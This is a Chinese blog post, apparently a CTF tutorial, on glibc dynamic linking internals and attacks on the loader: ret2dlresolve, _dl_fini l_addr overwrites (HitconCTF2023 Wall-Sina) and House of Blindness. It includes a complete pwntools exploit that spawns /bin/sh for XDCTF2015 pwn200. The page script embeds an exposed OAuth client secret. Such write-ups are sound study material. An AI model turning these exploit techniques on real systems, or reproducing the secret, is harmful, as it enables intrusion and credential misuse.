<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, viewport-fit=cover" name="viewport" />
  <title>
    
    dl 相关攻击 丨
    

    Whirling-In-Rags
  </title>

  
  <link rel="shortcut icon" href="/icon.svg">
  

  <link rel="preconnect" href="https://cdnjs.cloudflare.com">
  
  <link id="theme" rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/styles/atom-one-light.css">
  <script src="https://unpkg.com/@highlightjs/cdn-assets@11.9.0/highlight.min.js"></script>
  

  <!-- 字体 -->
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">
  <link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:ital,wght@0,100..800;1,100..800&display=swap" rel="stylesheet">

  
<link rel="stylesheet" href="/css/root.css">

  
<link rel="stylesheet" href="/css/style.css">

  
<link rel="stylesheet" href="/css/post.css">

<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="Whirling-In-Rags" type="application/atom+xml">
</head>

  <body>
    <header class="header">
  <section class="header-container">
    <a class="logo" href="/">Whirling-In-Rags</a>
    <ul class="nav">
      
      <li><a href="/archives">archives</a></li>
      
      <li><a href="/tags">tags</a></li>
      
      <li><a href="/about">about</a></li>
      
    </ul>
  </section>
</header>
      
            <main class="main">
              <article class="post">
  
  <div class="post-title">dl 相关攻击</div>
  <div class="post-meta">
    <div class="date">2024 April 30th</div>
    <div class="tags">
      
      <a class="tag-item" href="/tags/pwn" style="color: #d1d5da;">pwn</a>
      
    </div>
  </div>
  

  <main class="post-content"><h1 id="动态链接"><a href="#动态链接" class="headerlink" title="动态链接"></a>动态链接</h1><h2 id="机制"><a href="#机制" class="headerlink" title="机制"></a>机制</h2><p>使用动态链接时，程序按模块拆分为多个独立部分，在程序运行时才链接在一起。linux中ELF动态链接文件称为动态共享对象(DSO)，以<code>.so</code>为拓展名。常用的C语言运行库glibc保存为<code>libc.so</code>。</p>
<p>链接的操作由动态链接器ld完成。运行时动态链接器与普通共享对象一同被映射到进程的地址空间，程序在运行时首先运行ld，完成所有动态链接工作后再转交主程序。</p>
<p>如果程序中存在跨模块的数据访问，由于目标变量的地址要在装载时才能确定，需要使得程序中的代码地址无关。于是把跟地址相关的代码放在数据段里，即全局偏移表(Global Offset Table)。至于模块间的调用，跳转，也用GOT表实现，但是出于效率考虑，需要引入延迟绑定机制。</p>
<p>延迟绑定(Lazy Binding)的思想是在程序第一次用到时才绑定(符号查找，重定位)，使用PLT表(Procedure Linkage Table)实现，实现代码如下:</p>
<pre><code class="assembly">PLT0:
push *(GOT + 4)
jump *(GOT + 8)
...

bar@plt:
jmp *(bar@GOT)
push n
jump PLT0
</code></pre>
<p>(此处的实现与之后的利用密切相关)</p>
<p>其中<code>bar@GOT</code>中初始保存<code>bar@plt</code>的下一条指令(原地tp)，随后push的n是bar在重定位表项中的序号。<code>GOT + 4</code> 中保存一个名为<code>link_map</code>的结构体的地址，它保存了本模块动态链接的相关信息，<code>GOT + 8</code>中保存<code>_dl_runtime_resolve()</code>的地址，该函数的作用便是解析<code>link_map</code>，计算出bar函数的真正地址，并将其填入<code>bar@GOT</code>中</p>
<h2 id="实现结构"><a href="#实现结构" class="headerlink" title="实现结构"></a>实现结构</h2><h3 id="interp段"><a href="#interp段" class="headerlink" title=".interp段"></a><code>.interp</code>段</h3><p>一个字符串，动态连接器的路径</p>
<h3 id="dynamic段"><a href="#dynamic段" class="headerlink" title=".dynamic段"></a><code>.dynamic</code>段</h3><p><code>readelf -d Lib.so</code>查看<br>保存了动态连接器所需的基本信息，结构如下</p>
<pre><code class="c">typedef struct
&#123;
   Elf32_Sword   d_tag;          /* Dynamic entry type */
   union
     &#123;
       Elf32_Word d_val;         /* Integer value */
       Elf32_Addr d_ptr;         /* Address value */
     &#125; d_un;
 &#125; Elf32_Dyn;
 
typedef struct
&#123;
    Elf64_Sxword d_tag; /* Dynamic entry type */
    union
      &#123;
        Elf64_Xword d_val; /* Integer value */
        Elf64_Addr d_ptr; /* Address value */
      &#125; d_un;
&#125; Elf64_Dyn;
</code></pre>
<p>在<code>elf.h</code>中定义了不同d_tag的值与对应类型，后面比较常用的有</p>
<ul>
<li><code>DT_REL</code> 动态链接重定位表地址</li>
<li><code>DT_SYMTAB</code> 动态链接符号表地址</li>
<li><code>DT_STRTAB</code> 动态链接字符串表地址</li>
<li><code>DT_INIT</code> 初始化代码地址</li>
<li><code>DT_FINI</code> 结束代码地址</li>
</ul>
<h3 id="DT-REL动态链接重定位表"><a href="#DT-REL动态链接重定位表" class="headerlink" title="DT_REL动态链接重定位表"></a><code>DT_REL</code>动态链接重定位表</h3><p><code>readelf -r Lib.so</code>查看<br>共享对象的重定位在装载时完成，重定位表分为<code>.rel.dyn</code>和<code>.rel.plt</code>。前者修正数据引用，即<code>.got</code>和<code>.data</code>；后者修正<code>.got.plt</code>。</p>
<pre><code class="c">typedef struct
&#123;
    Elf32_Addr r_offset; /* Address */
    Elf32_Word r_info; /* Relocation type and symbol index */
&#125; Elf32_Rel;

typedef struct
&#123;
    Elf64_Addr r_offset; /* Address */
    Elf64_Xword r_info; /* Relocation type and symbol index */
&#125; Elf64_Rel;

/* How to extract and insert information held in the r_info field. */

#define ELF32_R_SYM(val) ((val) &gt;&gt; 8)
#define ELF32_R_TYPE(val) ((val) &amp; 0xff)
#define ELF32_R_INFO(sym, type) (((sym) &lt;&lt; 8) + ((type) &amp; 0xff))

#define ELF64_R_SYM(i) ((i) &gt;&gt; 32)
#define ELF64_R_TYPE(i) ((i) &amp; 0xffffffff)
#define ELF64_R_INFO(sym,type) ((((Elf64_Xword) (sym)) &lt;&lt; 32) + (type))
</code></pre>
<p><code>r_offset</code>表示需要修正的地址，<code>r_info</code>高位表示该符号在符号表中的序号，低位表示符号类型。</p>
<h3 id="DT-SYMTAB-动态链接符号表"><a href="#DT-SYMTAB-动态链接符号表" class="headerlink" title="DT_SYMTAB 动态链接符号表"></a><code>DT_SYMTAB</code> 动态链接符号表</h3><p><code>readelf -sD Lib.so</code>查看<br>通常保存在段<code>.dynsym</code></p>
<pre><code class="c">typedef struct
&#123;
    Elf32_Word st_name; /* Symbol name (string tbl index) */
    Elf32_Addr st_value; /* Symbol value */
    Elf32_Word st_size; /* Symbol size */
    unsigned char st_info; /* Symbol type and binding */
    unsigned char st_other; /* Symbol visibility */
    Elf32_Section st_shndx; /* Section index */
&#125; Elf32_Sym;

typedef struct
&#123;
    Elf64_Word st_name; /* Symbol name (string tbl index) */
    unsigned char st_info; /* Symbol type and binding */
    unsigned char st_other; /* Symbol visibility */
    Elf64_Section st_shndx; /* Section index */
    Elf64_Addr st_value; /* Symbol value */
    Elf64_Xword st_size; /* Symbol size */
&#125; Elf64_Sym;

/* How to extract and insert information held in the st_info field. */

#define ELF32_ST_BIND(val) (((unsigned char) (val)) &gt;&gt; 4)
#define ELF32_ST_TYPE(val) ((val) &amp; 0xf)
#define ELF32_ST_INFO(bind, type) (((bind) &lt;&lt; 4) + ((type) &amp; 0xf))

/* Both Elf32_Sym and Elf64_Sym use the same one-byte st_info field. */
#define ELF64_ST_BIND(val) ELF32_ST_BIND (val)
#define ELF64_ST_TYPE(val) ELF32_ST_TYPE (val)
#define ELF64_ST_INFO(bind, type) ELF32_ST_INFO ((bind), (type))
</code></pre>
<h3 id="DT-STRTAB-动态链接字符串表"><a href="#DT-STRTAB-动态链接字符串表" class="headerlink" title="DT_STRTAB 动态链接字符串表"></a><code>DT_STRTAB</code> 动态链接字符串表</h3><p><code>.dynstr</code>中<br>存储字符串，无需赘述</p>
<h3 id="link-map"><a href="#link-map" class="headerlink" title="link_map"></a><code>link_map</code></h3><p>一个结构体，保存动态链接相关信息<br>代码太长不贴，有两个比较重要的部分</p>
<ul>
<li><code>l_addr</code> 程序的基址</li>
<li><code>l_info[]</code>一个数组，保存了多个重定位项的地址</li>
</ul>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>调用<code>_dl_runtime_resolve</code>时，传参<code>link_map</code>和<code>rel_offset</code>，查找流程如下</p>
<pre><code class="c">_dl_runtime_resolve(link_map, rel_offset)
                                       +
          +-----------+                |
          | Elf32_Rel | &lt;--------------+
          +-----------+
     +--+ | r_offset  |        +-----------+
     |    |  r_info   | +----&gt; | Elf32_Sym |
     |    +-----------+        +-----------+      +----------+
     |      .rel.plt           |  st_name  | +--&gt; | system\0 |
     |                         |           |      +----------+
     v                         +-----------+        .dynstr
+----+-----+                      .dynsym
| &lt;system&gt; |
+----------+
  .got.plt
</code></pre>
<h1 id="ret2dlresolve"><a href="#ret2dlresolve" class="headerlink" title="ret2dlresolve"></a>ret2dlresolve</h1><h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>调用<code>_dl_runtime_resolve</code>后，实际完成绑定工作的是其中调用的<code>_dl_fixup</code></p>
<pre><code class="c">/* This function is called through a special trampoline from the PLT the
first time each PLT entry is called. We must perform the relocation
specified in the PLT of the given shared object, and return the resolved
function address to the trampoline, which will restart the original call
to that address. Future calls will bounce directly from the PLT to the
function. */

DL_FIXUP_VALUE_TYPE
attribute_hidden __attribute ((noinline)) ARCH_FIXUP_ATTRIBUTE
_dl_fixup (
# ifdef ELF_MACHINE_RUNTIME_FIXUP_ARGS
        ELF_MACHINE_RUNTIME_FIXUP_ARGS,
# endif
        struct link_map *l, ElfW(Word) reloc_arg)
&#123;
    const ElfW(Sym) *const symtab
     = (const void *) D_PTR (l, l_info[DT_SYMTAB]);
    const char *strtab = (const void *) D_PTR (l, l_info[DT_STRTAB]);

    const uintptr_t pltgot = (uintptr_t) D_PTR (l, l_info[DT_PLTGOT]);

    const PLTREL *const reloc
     = (const void *) (D_PTR (l, l_info[DT_JMPREL])
            + reloc_offset (pltgot, reloc_arg));
    const ElfW(Sym) *sym = &amp;symtab[ELFW(R_SYM) (reloc-&gt;r_info)];
    const ElfW(Sym) *refsym = sym;
    void *const rel_addr = (void *)(l-&gt;l_addr + reloc-&gt;r_offset);
    lookup_t result;
    DL_FIXUP_VALUE_TYPE value;

    /* Sanity check that we&#39;re really looking at a PLT relocation. */
    assert (ELFW(R_TYPE)(reloc-&gt;r_info) == ELF_MACHINE_JMP_SLOT);

    /* Look up the target symbol. If the normal lookup rules are not
        used don&#39;t look in the global scope. */
    if (__builtin_expect (ELFW(ST_VISIBILITY) (sym-&gt;st_other), 0) == 0)
      &#123;
        const struct r_found_version *version = NULL;

        if (l-&gt;l_info[VERSYMIDX (DT_VERSYM)] != NULL)
      &#123;
        const ElfW(Half) *vernum =
          (const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
        ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc-&gt;r_info)] &amp; 0x7fff;
        version = &amp;l-&gt;l_versions[ndx];
        if (version-&gt;hash == 0)
            version = NULL;
      &#125;

        /* We need to keep the scope around so do some locking. This is
        not necessary for objects which cannot be unloaded or when
        we are not using any threads (yet). */
        int flags = DL_LOOKUP_ADD_DEPENDENCY;
        if (!RTLD_SINGLE_THREAD_P)
      &#123;
        THREAD_GSCOPE_SET_FLAG ();
        flags |= DL_LOOKUP_GSCOPE_LOCK;
      &#125;

#ifdef RTLD_ENABLE_FOREIGN_CALL
        RTLD_ENABLE_FOREIGN_CALL;
#endif

        result = _dl_lookup_symbol_x (strtab + sym-&gt;st_name, l, &amp;sym, l-&gt;l_scope,
                    version, ELF_RTYPE_CLASS_PLT, flags, NULL);

        /* We are done with the global scope. */
        if (!RTLD_SINGLE_THREAD_P)
      THREAD_GSCOPE_RESET_FLAG ();

#ifdef RTLD_FINALIZE_FOREIGN_CALL
        RTLD_FINALIZE_FOREIGN_CALL;
#endif

        /* Currently result contains the base load address (or link map)
        of the object that defines sym. Now add in the symbol
        offset. */
        value = DL_FIXUP_MAKE_VALUE (result,
                    SYMBOL_ADDRESS (result, sym, false));
      &#125;
    else
      &#123;
        /* We already found the symbol. The module (and therefore its load
address) is also known. */
        value = DL_FIXUP_MAKE_VALUE (l, SYMBOL_ADDRESS (l, sym, true));
        result = l;
      &#125;

    /* And now perhaps the relocation addend. */
    value = elf_machine_plt_value (l, reloc, value);

    if (sym != NULL
        &amp;&amp; __builtin_expect (ELFW(ST_TYPE) (sym-&gt;st_info) == STT_GNU_IFUNC, 0))
      value = elf_ifunc_invoke (DL_FIXUP_VALUE_ADDR (value));

    /* Finally, fix up the plt itself. */
    if (__glibc_unlikely (GLRO(dl_bind_not)))
        return value;

    return elf_machine_fixup_plt (l, result, refsym, sym, reloc, rel_addr, value);

&#125;
</code></pre>
<pre><code class="c">/* All references to the value of l_info[DT_PLTGOT],
l_info[DT_STRTAB], l_info[DT_SYMTAB], l_info[DT_RELA],
l_info[DT_REL], l_info[DT_JMPREL], and l_info[VERSYMIDX (DT_VERSYM)]
have to be accessed via the D_PTR macro. The macro is needed since for
most architectures the entry is already relocated - but for some not
and we need to relocate at access time. */
#ifdef DL_RO_DYN_SECTION
# define D_PTR(map, i) ((map)-&gt;i-&gt;d_un.d_ptr + (map)-&gt;l_addr)
#else
# define D_PTR(map, i) (map)-&gt;i-&gt;d_un.d_ptr
#endif
</code></pre>
<p>该函数查找函数对应的重定位表项通过:</p>
<pre><code class="c">    const PLTREL *const reloc
     = (const void *) (D_PTR (l, l_info[DT_JMPREL])
            + reloc_offset (pltgot, reloc_arg));
</code></pre>
<p>即通过<code>link_map</code>中的<code>l_info</code>数组中的<code>DT_JMPREL</code>项找到<code>.rel.plt</code>地址，加上先前传入参数<code>reloc_arg</code>的偏移。这里的利用方法就是通过传入错误的<code>reloc_arg</code>，使其查找到我们伪造好的<code>.rel.plt</code>项，实现对重定位项的劫持，解析为我们想要的函数。</p>
<p>由延迟绑定的机制可知，我们需要先压栈我们需要的<code>reloc_arg</code>，随后调用<code>plt0</code>。并在对应地址上伪造好<code>.rel.plt</code>，<code>dynsym</code>，<code>dynstr</code>。在<code>dynstr</code>中写入想要解析的任意函数即可。</p>
<p>具体伪造方法以XDCTF2015 pwn200为例</p>
<h2 id="例"><a href="#例" class="headerlink" title="例"></a>例</h2><p>题目源码</p>
<pre><code class="c">#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

void vuln()
&#123;
    char buf[100];
    setbuf(stdin, buf);
    read(0, buf, 256);
&#125;
int main()
&#123;
    char buf[100] = &quot;Welcome to XDCTF2015~!\n&quot;;

    setbuf(stdout, buf);
    write(1, buf, strlen(buf));
    vuln();
    return 0;
&#125;
</code></pre>
<p>题目为32位，只开了NX，Partial RELRO<br>由于溢出长度不够，我们先进行一次栈迁移，在已知的目标地址上写入我们的伪造项<br>exp如下:</p>
<pre><code class="c">#!/usr/bin/env python
#-*- coding: utf-8 -*-
from pwn import*
import os

context(os = &#39;linux&#39;, arch = &#39;i386&#39;, log_level = &#39;debug&#39;, terminal = [&#39;tmux&#39;, &#39;new-window&#39;])

def debug(cmd = &#39;&#39;):
    if len(sys.argv)!=1:
        return
    cmd += &quot;&quot;&quot;
    b system
    &quot;&quot;&quot;
    gdb.attach(p, cmd)
    pause()

def exp(host = &quot;0.0.0.0&quot;, port=11451, exe = &quot;./vuln&quot;):
  global p
  if len(sys.argv)==1:
    p = process(exe)
  else:
    p = remote(host, port)
  pass
  elf = ELF(&#39;./vuln&#39;)

  leave_ret = 0x08049105
  pop3 = 0x080491e9
  pop_ebp = 0x080491eb

  write_plt = elf.plt[&#39;write&#39;]
  write_got = elf.got[&#39;write&#39;]
  read_plt = elf.plt[&#39;read&#39;]

  plt_0    = elf.get_section_by_name(&#39;.plt&#39;).header.sh_addr
  rel_plt  = elf.get_section_by_name(&#39;.rel.plt&#39;).header.sh_addr
  dynsym   = elf.get_section_by_name(&#39;.dynsym&#39;).header.sh_addr     
  dynstr   = elf.get_section_by_name(&#39;.dynstr&#39;).header.sh_addr     
  bss_addr = elf.get_section_by_name(&#39;.bss&#39;).header.sh_addr
  text_addr = elf.get_section_by_name(&#39;.text&#39;).header.sh_addr

  base_addr = bss_addr + 0x800

  payload = b&quot;\x00&quot; * (112)
  payload += flat([read_plt, pop3, 0, base_addr, 0x100, pop_ebp, base_addr -4, leave_ret])
  p.recv()
  p.send(payload)

  reloc_index = base_addr + 24 - rel_plt 
  fake_sym_addr = base_addr + 32
  align = 0x10 - ((fake_sym_addr - dynsym) &amp; 0xf)
  fake_sym_addr += align

  r_sym = int((fake_sym_addr - dynsym) / 0x10)
  r_type = 0x7
  r_info = (r_sym &lt;&lt; 8) + (r_type &amp; 0xff) 
  fake_reloc = flat([write_got, r_info])

  st_name = fake_sym_addr + 0x10 - dynstr
  st_bind = 0x1
  st_type = 0x2
  st_info = (st_bind &lt;&lt; 4) + (st_type &amp; 0xf)
  fake_sym = flat([st_name, 0, 0, st_info])

  payload = flat([plt_0, reloc_index, 0x08049196, base_addr + 0x80, 0, 0])
  payload += fake_reloc
  payload += b&quot;\x00&quot; * align
  payload += fake_sym
  payload += b&quot;system\x00&quot;
  payload = payload.ljust(0x80, b&quot;\x00&quot;)
  payload += flat([b&quot;/bin/sh\x00&quot;])
  payload = payload.ljust(0x100, b&quot;\x00&quot;)
  p.send(payload)

if __name__ == &#39;__main__&#39;:
    exp()
    p.interactive()
</code></pre>
<p>注意dl相关函数占用较多栈空间，迁移之后可能出现栈生长到其他不可写段的情况，所以迁移的地址需要离bss足够远。</p>
<h2 id="64位情况"><a href="#64位情况" class="headerlink" title="64位情况"></a>64位情况</h2><p>存在以下区别:</p>
<ul>
<li>在32位中，<code>reloc_arg</code>作为偏移量，而在64位中作为<code>.rel.plt</code>的数组下标</li>
<li>结构体均升级为64位版本</li>
<li>version问题<br>version问题如下</li>
</ul>
<pre><code class="c">if (l-&gt;l_info[VERSYMIDX (DT_VERSYM)] != NULL)
&#123;
    const ElfW(Half) *vernum =
      (const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
    ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc-&gt;r_info)] &amp; 0x7fff;
    version = &amp;l-&gt;l_versions[ndx];
    if (version-&gt;hash == 0)
        version = NULL;
&#125;
</code></pre>
<p>此处把<code>(reloc-&gt;r_info)&gt;&gt;32</code>作为下标取值<code>vernum</code>，由于我们伪造的<code>(reloc-&gt;r_info)&gt;&gt;32</code>很大，导致容易取到不可读区域。</p>
<p>解决方法之一是避免进入该循环，即使得<code>l-&gt;l_info[VERSYMIDX (DT_VERSYM)]</code>为0，地址为<code>link_map+0x1c8</code>。然而这需要泄露ld地址，都有地址了还打ret2dl就不礼貌了。</p>
<p>另一种解决方案是选择不进入<code>if (__builtin_expect (ELFW(ST_VISIBILITY) (sym-&gt;st_other), 0) == 0)</code>的大循环，而是走else分支</p>
<pre><code class="c">else
  &#123;
    /* We already found the symbol. The module (and therefore its load
address) is also known. */
    value = DL_FIXUP_MAKE_VALUE (l, l-&gt;addr + sym-&gt;st_value);
    result = l;
  &#125;
</code></pre>
<p><code>DL_FIXUP_MAKE_VALUE</code>用于计算函数真实值。我们只需将<code>sym-&gt;st_value</code>指向某个已解析函数的got表，<code>l-&gt;addr</code>指向目标函数和已解析函数的偏移。</p>
<p>在不泄露ld的情况下伪造<code>l-&gt;addr</code>，我们需要伪造<code>link_map</code>，一般需要满足:<br>1.<code>link_map</code>中的<code>DT_STRTAB</code>、<code>DT_SYMTAB</code>、<code>DT_JMPREL</code>可读<br>2.<code>DT_SYMTAB</code>结构体中的<code>d_ptr</code>即<code>sym</code>，<code>*(sym+5) &amp; 0x03 != 0</code><br>3.<code>(reloc-&gt;r_info)&amp;0xff == 7</code><br>4.<code>rel_addr = l-&gt;addr + reloc-&gt;r_offset</code>即原先需要修改的got表地址有可写权限<br>5.<code>l-&gt;l_addr + sym-&gt;st_value</code> 为system的地址</p>
<h1 id="dl-fini的利用"><a href="#dl-fini的利用" class="headerlink" title="_dl_fini的利用"></a><code>_dl_fini</code>的利用</h1><h2 id="特性"><a href="#特性" class="headerlink" title="特性"></a>特性</h2><p>该函数在ld.so中，在exit时调用，并对<code>.fini</code>和<code>.fini_array</code>中函数进行调用。</p>
<pre><code class="c">/* Is there a destructor function? */
if (l-&gt;l_info[DT_FINI_ARRAY] != NULL
    || (ELF_INITFINI &amp;&amp; l-&gt;l_info[DT_FINI] != NULL))
  &#123;
    /* When debugging print a message first. */
    if (__builtin_expect (GLRO(dl_debug_mask)
                    &amp; DL_DEBUG_IMPCALLS, 0))
        _dl_debug_printf (&quot;\ncalling fini: %s [%lu]\n\n&quot;,
         				DSO_FILENAME (l-&gt;l_name),
                        ns);
    /* First see whether an array is given. */
    if (l-&gt;l_info[DT_FINI_ARRAY] != NULL)
      &#123;
        ElfW(Addr) *array =
          (ElfW(Addr) *) (l-&gt;l_addr
                        + l-&gt;l_info[DT_FINI_ARRAY]-&gt;d_un.d_ptr);
        unsigned int i = (l-&gt;l_info[DT_FINI_ARRAYSZ]-&gt;d_un.d_val
                        / sizeof (ElfW(Addr)));
        while (i-- &gt; 0)
            ((fini_t) array[i]) ();
      &#125;
  
    /* Next try the old-style destructor. */
    if (ELF_INITFINI &amp;&amp; l-&gt;l_info[DT_FINI] != NULL)
        DL_CALL_DT_FINI
            (l, l-&gt;l_addr + l-&gt;l_info[DT_FINI]-&gt;d_un.d_ptr);
&#125;
</code></pre>
<p>这里对<code>.fini_array</code>的定位是通过<code>l-&gt;l_addr+ l-&gt;l_info[DT_FINI_ARRAY]-&gt;d_un.d_ptr</code>实现的，这就给了我们操作的空间</p>
<h2 id="HitconCTF2023-Wall-Sina"><a href="#HitconCTF2023-Wall-Sina" class="headerlink" title="HitconCTF2023 Wall-Sina"></a>HitconCTF2023 Wall-Sina</h2><p>源码如下:</p>
<pre><code class="c">#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;

int main();

char buff[0x48];
void *const gift = main;

int main() &#123;
    read(STDIN_FILENO, buff, 0x40);
    printf(buff);
&#125;
</code></pre>
<p>保护全开<br>栈上残留了指针<code>_rtld_global</code>和<code>_rtld_global._dl_ns[0]._ns_loaded</code>，读<code>rtld_global</code>结构体源码可知，<code>_ns_loaded</code>是结构体<code>link_map</code>的指针<br>故我们可以通过fmt任意写在<code>link_map</code>的第一项，也就是<code>l_addr</code>处写任意地址。<br>题目在<code>.data.rel</code>保留了一个main的指针，且在<code>.fini_array</code>后不远处，故我们可以改写<code>l_addr</code>的LSB，使<code>l-&gt;l_addr+ l-&gt;l_info[DT_FINI_ARRAY]-&gt;d_un.d_ptr</code>指向该指针，达成第二次fmt。在泄露各地址之后还能再该<code>l_addr</code>使<code>.fini</code>定位到main达成第三次fmt。</p>
<h2 id="House-of-Blindness"><a href="#House-of-Blindness" class="headerlink" title="House of Blindness"></a>House of Blindness</h2><p>该手法无需泄露地址，需要mmap相关的任意写</p>
<p>依旧是改写<code>l_addr</code>的LSB，使<code>l-&gt;l_addr + l-&gt;l_info[DT_FINI]-&gt;d_un.d_ptr</code>指向目标函数。然而<code>.dynamic</code>很大，超过了256bytes，这意味着可能需要爆破一个byte。</p>
<p>该手法给出了不用爆破的解决方案。使用<code>.dynamic</code>段中的<code>DT_DEBUG</code>项。该项指向了一个位于ld.so中的<code>_r_debug</code>结构，且有可写权限，可以通过覆盖LSB达成对libc函数的调用。<br>由于ld.so地址在libc.so之后，地址显然更大，可以将<code>l_addr</code>改为负数(补码形式)来解决。<br>另外，此时的rdi正好落在<code>dl_load_lock</code>上，位于ld.so中，也是可控的。</p>
<hr>
<p>参考资料:</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://bbs.kanxue.com/thread-253833.htm#msg_header_h2_2">[看雪]dl_runtime_resolve结合源码分析及常见的几种攻击手法</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/firmianay/CTF-All-In-One/blob/master/doc/6.1.3_pwn_xdctf2015_pwn200.md">CTF-All-In-One</a></li>
<li><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/657009223">[知乎]HitconCTF2023 pwn Wall-Sina wp</a></li>
<li><a target="_blank" rel="noopener" href="https://hackmd.io/jmE0VvcTQaaJm6SEWiqUJA#refining-our-exploit-with-_r_debug">[Hackmd]house of blindness</a></li>
<li>《程序员的自我修养》</li>
</ul>
</main>

  
    <div id="gitalk-container" style="padding: 60px 30px 0px 30px;"></div> 

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">
<script src="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>
<script type="text/javascript">

if(true){
	var gitalk = new Gitalk({
  	clientID: 'Ov23liOeINaDo82m26KW',
  	clientSecret: '40d0c404806ec19c706fad7b692aba1c3a281818',
  	repo: 'DeePunk42.github.io',
  	owner: 'DeePunk42',
  	admin: ['DeePunk42'],
  	id: 'Tue Apr 30 2024 00:00:00 GMT+0800',
  	distractionFreeMode: 'true'
})
gitalk.render('gitalk-container') 
}
</script>
    
</article>


<script src="/js/highlight.js"></script>

            </main>
            
              <footer class="footer">
  
  <span>Copyright © 2021 DeePunk</span>
  
</footer>
                
<script src="/js/theme.js"></script>

  </body>

</html>